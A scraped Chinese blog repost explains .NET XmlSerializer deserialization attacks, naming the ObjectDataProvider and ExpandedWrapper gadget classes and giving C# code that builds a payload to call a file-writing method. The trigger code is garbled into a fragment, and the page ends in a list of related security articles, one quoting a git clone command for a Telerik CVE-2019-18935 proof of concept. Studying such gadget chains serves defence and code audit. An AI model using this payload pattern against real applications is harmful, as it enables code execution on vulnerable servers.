.Net反序列化漏洞之XmlSerializer

最新推荐文章于 2023-03-15 21:39:18 发布
最新推荐文章于 2023-03-15 21:39:18 发布
阅读量260 收藏
点赞数
CC 4.0 BY-SA版权
原文链接:https://yq.aliyun.com/articles/519191
本文介绍了一种通过构造恶意payload利用XML序列化漏洞的方法。该方法通过创建特定类型的对象并设置其属性来实现文件写入操作。具体步骤包括初始化对象、设置属性值以及序列化对象到文件。

条件:

  1. 初始化对象时,类型可控:new XmlSerializer(type可控)
  2. 反序列化对象时,输入内容可控:serializer.Deserialize(fi可控)

两个关键类:ObjectDataProvider, ExpandedWrapper

//PresentationFramework.dll  v4.0.0.0
System.Windows.Data.ObjectDataProvider

//System.Data.Services.dll   v4.0.0.0
System.Data.Services.Internal.ExpandedWrapper

Payload生成:

        public static void serializeObjectWithXmlSer()
        {
            ExpandedWrapper<Class2, ObjectDataProvider> eobj = new ExpandedWrapper<Class2,ObjectDataProvider>();
            XmlSerializer serializer = new XmlSerializer(typeof(ExpandedWrapper<Class2, ObjectDataProvider>));
            eobj.ProjectedProperty0 = new ObjectDataProvider();
            eobj.ProjectedProperty0.ObjectInstance = new Class2();
            eobj.ProjectedProperty0.MethodName = "writeFile";
            eobj.ProjectedProperty0.MethodParameters.Add("xxxxx");
            eobj.ProjectedProperty0.MethodParameters.Add("ser.txt");

            TextWriter fo = new StreamWriter("d:/tmp/xmlser.txt");
            serializer.Serialize(fo, eobj);
            fo.Close();
        }

触发Payload:

public static void deserializeObjectWithXmlSer()
        newtypeofnew"d:/tmp/xmlser.txt" ,如需转载请自行联系原作者
反序列化漏洞汇总
hackzkaq的博客
12-08 5402
.反序列化的基本内容 类对象方法 类(Class): 用来描述具有相同的属性和方法的对象的集合。 它定义了该集合中每个对象所共有的属性和方法。对象是类的实例。 对象:通过类定义的数据结构实例。对象包括两个数据成员(类变量和实例变量)和方法。 对象:某一个具体的事物、实体或事例 类是类型,比如人类,犬类; 对象是某种类的一个实例(实际的例子),比如身为人类的你就是一个对象,你家养的狗就属于犬类的一个对象,或者说一个实例; 你可能经常会听到“实例化对象”,这句话的意思就是创建对象,此处的实例名词作动词用,作名
国内首本 .NET 攻防实战力作丨《.NET安全攻防指南》新书上线,文末领取福利!
最新发布
ahhacker86的专栏
03-22 925
不少读者反馈,本书内容系统全面,涵盖从基础原理到攻防实战的完整技术体系,特别是在.NET Web安全审计和逆向工程领域,提供了许多实用的思路和技巧,极具实战价值。上册主要聚焦于B/S架构下的安全实践,结构上从.NET基础知识入手,循序渐进地揭示.NET Web代码审计的核心技术与攻防思路,帮助读者全面掌握.NET Web应用的安全要点。本书凝聚了多年来在.NET安全领域的攻防实战经验,内容系统全面,涵盖从基础原理到红蓝对抗的完整技术体系,是.NET安全研究者和攻防实战者不可或缺的技术宝典。
.NET 高级代码审计(第一课)XmlSerializer 反序列漏洞
03-07
.NET 框架中的 XmlSerializer 类是一种很棒的工具,它是将高度结构化的 XML 数据 映射为 .NET 对象。XmlSerializer 类在程序中通过单个 API 调用来执行 XML 文档和对 象之间的转换。转换的映射规则在 .NET 类中通过元数据属性来表示,如果程序开发人 员使用 Type 类的静态方法获取外界数据,并调用 Deserialize 反序列化 xml 数据就会 触发反序列化漏洞攻击(例如 DotNetNuke 任意代码执行漏洞 CVE-2017-9822),本 文笔者从原理和代码审计的视角做了相关脑图介绍和复现。
XmlSerializer反序列化漏洞
UKK
06-20 681
XmlSerializer反序列化漏洞 http://www.ifind.cc/view/234
.NET高级代码审计(第一课)XmlSerializer反序列漏洞
zls365365的博客
06-04 843
0X00 前言在.NET 框架中的 XmlSerializer 类是一种很棒的工具,它是将高度结构化的 XML 数据映射为 .NET 对象。XmlSerializer类在程序中通过单个 API 调用来执行 XML 文档和对象之间的转换。转换的映射规则在 .NET 类中通过元数据属性来表示,如果程序开发人员使用Type类的静态方法获取外界数据,并调用Deserialize反...
.NET高级代码审计(第一课)XmlSerializer反序列化漏洞
weixin_33825683的博客
03-09 245
0X00 前言 在.NET 框架中的 XmlSerializer 类是一种很棒的工具,它是将高度结构化的 XML 数据映射为 .NET 对象。XmlSerializer类在程序中通过单个 API 调用来执行 XML 文档和对象之间的转换。转换的映射规则在 .NET 类中通过元数据属性来表示,如果程序开发人员使用Type类的静态方法获取外界数据,并调用Deserialize反序列化xml数据就会触...
C#语言中的反序列化技术深度解析
其中,`BinaryFormatter`是最早期也是最经典的一个反序列化工具。然而,随着安全问题的日益突出,`BinaryFormatter`由于其设计上的缺陷,已经不再推荐使用。微软推荐使用`DataContractJsonSerializer`、`...
dotnet-ysoserialnet用于各种NET格式化器的反序列化有效负载生成器
08-15
然而,不恰当的反序列化操作可能带来安全风险,ysoserial.net便是针对这一问题设计的工具,用于生成各种.NET格式化器的反序列化有效负载,帮助开发者发现并修复潜在的安全漏洞。 ysoserial.net是一个开源项目,其...
ASP.NET XML Serializer
03-21
ASP.NET XML Serializer,可以序列化和反序列化任意类型
Weblogic+XML反序列化漏洞检查工具CVE-2017-10271+V1.2
05-21
好用的Weblogic XML 反序列化漏洞检查工具 CVE-2017-10271 使用范围Oracle WebLogic Server 10.3.6.0.0版本 Oracle WebLogic Server 12.2.1.1.0版本 Oracle WebLogic Server 12.1.3.0.0版本
CVE-2019-18935:RCE漏洞用于ASP.NET AJAX的Telerik UI中的.NET JSON反序列化漏洞
05-25
CVE-2019-18935 Telerik UI中用于ASP.NET AJAX的.NET JSON反序列化漏洞的概念验证漏洞,允许远程执行代码。 描述 是用于Web应用程序的UI组件的广泛使用的套件。 它以不安全的方式反序列化JSON对象,从而导致在软件的基础主机上执行任意远程代码。 有关更多信息,请参见: DerpCon演讲( )详细介绍了利用不安全的反序列化的其他基础知识,并将其应用于这种利用,并逐步介绍了一些在ASP.NET Web应用程序上获取shell的技巧。 该主教福克斯,包括此漏洞的完整的演练,并利用此问题的详细信息(带补丁的说明一起)。 入门 先决条件 您需要安装才能使用build-dll.bat编译混合模式.NET程序集DLL有效负载。 安装 git clone https://github.com/noperator/CVE-2019-18935.git &&
XmlSerializer .NET 序列化、反序列化
weixin_34281537的博客
05-22 161
序列化对象 要序列化对象,首先创建要序列化的对象并设置其公共属性和字段。为此,您必须确定要将XML流存储的传输格式,作为流或文件。 例如,如果XML流必须以永久形式保存,则创建一个FileStream对象。 序列化对象 创建对象并设置其公共字段和属性。 构造一个XmlSerializer的使用对象的类型。有关更多信息,请参阅XmlSerializer...
.net 获取xml 属性值_【硬货分享】.NET高级代码审计:DataContractSerializer反序列化漏洞...
weixin_33536190的博客
12-10 545
作者:Ivan1ee@360云影实验室0X00 前言DataContractSerializer类用于序列化和反序列化Windows Communication Foundation (WCF) 消息中发送的数据,用于把CLR数据类型序列化成XML流,它位于命名空间System.Runtime.Serialization,继承于System.Runtime.Serialization.XmlObj...
html读取xml_.net那些XML漏洞
weixin_42469706的博客
01-19 198
0x01 序言xml文件格式常用于配置文件,在java领域我们也常看到xml的配置文件,比较明显的就是tomcat的用户配置文件“tomcat-users.xml”,与java语法相近的.netC#其实也是常用xml文件格式作为配置文件,今天我要介绍的就是使用C#来介绍与xml文件格式相关的漏洞。这是 .net MVC中默认的配置文件之一。0x02准备工作 在接下来的学习中,我们...
XML Decoder反序列化漏洞(CVE-2017-10271)
热门推荐
yumengzth的博客
07-27 1万+
0x00 漏洞产生的原因 CVE-2017-10271漏洞产生的原因大致是Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。攻击者发送精心构造的xml数据甚至能通过反弹shell拿到权限。 反序列化漏洞的原理与动态调试推荐链接 WebLogic XMLDeco...
XmlSerializer为ASP.NET打造配置文件
阿良.NET
06-29 1623
在ASP.NET的配置文件Web.config中,可以方便加入自定义键值对。如下:     需要时可以这样取出值。string myValue = System.Configuration.ConfigurationSettings.AppSettings["myKey"]; 但是web.config中的内容如被更改会使整个HttpApplication重启,在Web.config中存放频繁更改的
.NET反序列化利用链入门——XmlSerializer
小王的储物间
03-15 346
1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)2、渗透测试基础(一周)①渗透测试的流程、分类、标准②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等3、操作系统基础(一周)
ASP.NET中JSON的序列化和反序列化
javababy1
01-15 231
导读:JSON是专门为浏览器中的网页上运行的JavaScript代码而设计的一种数据格式。在网站应用中使用JSON的场景越来越多,本文介绍 ASP.NET中JSON的序列化和反序列化,主要对JSON的简单介绍,ASP.NET如何序列化和反序列化的处理,在序列化和反序列化对日期时间、集合、字典的处理。 一、JSON简介 JSON(JavaScript Object Notation,Java...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值